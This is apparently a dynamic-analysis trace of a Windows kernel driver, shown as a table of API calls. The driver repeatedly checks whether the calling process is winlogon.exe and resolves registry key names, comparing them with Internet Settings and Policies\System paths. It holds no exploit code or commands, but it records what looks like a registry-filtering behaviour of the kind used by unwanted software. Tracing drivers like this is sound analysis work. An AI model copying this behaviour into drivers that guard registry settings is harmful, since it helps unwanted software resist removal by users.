| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
